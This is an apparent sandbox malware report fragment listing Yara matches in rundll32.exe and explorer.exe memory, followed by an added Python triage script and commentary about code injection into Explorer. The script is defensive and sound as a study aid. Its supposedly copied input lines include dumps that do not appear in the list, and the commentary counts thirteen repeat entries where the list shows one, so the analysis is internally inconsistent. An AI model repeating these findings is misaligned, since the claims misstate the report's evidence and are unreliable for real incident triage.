Source: Yara match File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
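The memory-dump names in the list above carry enough structure to turn the raw hits into a per-process picture of where the Yara rules fired. The Python below is an added example written for this page, not code from the sandbox report or its vendor; it parses a subset of the lines listed above. It assumes the dump-name layout `<process index>.<sequence>.<timestamp>.<base address>.<protection>.<flags>...sdmp` with hex fields (so `00000012` is process 18, matching `18.3.rundll32.exe.7df4f0220000.0.unpack`, and `00000016` is process 22, matching `22.0.explorer.exe.13a0000.0.unpack`), that the protection field holds a Windows PAGE_* value, and that a PID can be joined to a process index because each image name appears once; all three are assumptions about the report format, not facts stated on the page.

```python
import re
from collections import defaultdict

# Lines copied from the Yara-match list above (the report's own data, not constructed input).
REPORT_LINES = [
    "Source: Yara match File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR",
    "Source: Yara match File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE",
]

SOURCE_RE = re.compile(r"File source: (?P<src>.+?), type: (?P<kind>\w+)$")

# Assumed dump-name layout (hex fields, dot separated):
#   <process index>.<sequence>.<timestamp>.<base address>.<protection>.<three flag fields>.sdmp
MEMDUMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<seq>[0-9a-f]{8})\.(?P<ts>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<prot>[0-9a-f]{8})\.[0-9a-f]{8}\.[0-9a-f]{8}\.[0-9a-f]{8}\.sdmp$",
    re.IGNORECASE,
)
# Assumed unpacked-PE layout: <process index>.<stage>.<image>.<base>.<n>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.\d+\.(?P<image>.+?\.(?:exe|dll))\.(?P<base>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$",
    re.IGNORECASE,
)
PIDSPACE_RE = re.compile(r"^Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+)$")

# Windows PAGE_* constants; reading the protection field as one of these is an assumption.
PAGE_PROT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0xF0  # any of the four PAGE_EXECUTE* values


def triage(lines):
    """Group Yara hits by process index; attach the image name (from unpack names) and the PID
    (from 'Process Memory Space' lines). The PID join assumes each image name occurs once."""
    procs = defaultdict(lambda: {"image": None, "pid": None, "regions": {}, "unpacked": set()})
    pid_by_image = {}
    for line in lines:
        m = SOURCE_RE.search(line)
        if not m:
            continue
        src, kind = m["src"], m["kind"]
        if kind == "MEMORY" and (d := MEMDUMP_RE.match(src)):
            proc, base, prot = int(d["proc"], 16), int(d["base"], 16), int(d["prot"], 16)
            region = procs[proc]["regions"].setdefault(base, {"protect": prot, "hits": 0})
            region["hits"] += 1  # several dumps of the same region over time count as repeat hits
        elif kind == "UNPACKEDPE" and (u := UNPACK_RE.match(src)):
            proc = int(u["proc"])
            procs[proc]["image"] = u["image"]
            procs[proc]["unpacked"].add(int(u["base"], 16))
        elif kind == "MEMORYSTR" and (p := PIDSPACE_RE.match(src)):
            pid_by_image[p["image"]] = int(p["pid"])
    for info in procs.values():
        info["pid"] = pid_by_image.get(info["image"])
    return dict(procs)


def executable_regions(procs, proc):
    """Base addresses of matched regions that were dumped with an execute protection."""
    return {b for b, r in procs[proc]["regions"].items() if r["protect"] & EXEC_MASK}


def summarize(procs):
    """Plain-text triage view: one line per process, one indented line per matched region."""
    out = []
    for proc in sorted(procs):
        info = procs[proc]
        out.append(f"process {proc} {info['image']} PID {info['pid']}: {len(info['regions'])} matched regions")
        for base in sorted(info["regions"]):
            r = info["regions"][base]
            tag = " (also recovered as unpacked PE)" if base in info["unpacked"] else ""
            out.append(f"  0x{base:X} {PAGE_PROT.get(r['protect'], hex(r['protect']))} hits={r['hits']}{tag}")
    return "\n".join(out)


if __name__ == "__main__":
    print(summarize(triage(REPORT_LINES)))
```

Under those assumptions the summary shows explorer.exe (PID 2580) holding Yara-matched PAGE_EXECUTE_READWRITE regions at 0x13A0000 and 0x3250000, with 0x13A0000 also recovered as an unpacked PE, which lines up with the "Injects a PE file into a foreign processes" and "Injects code into the Windows Explorer" signatures in the overview; the rundll32.exe (PID 7320) hits are all in read-write regions, the staging side of the injection. The same grouping is the first thing to check when a report lists many near-identical dumps: the repeated 000002921161C000 entries above are one region dumped at different timestamps, not thirteen distinct findings.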
[Legend of the report's IP distribution map (image not reproduced): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]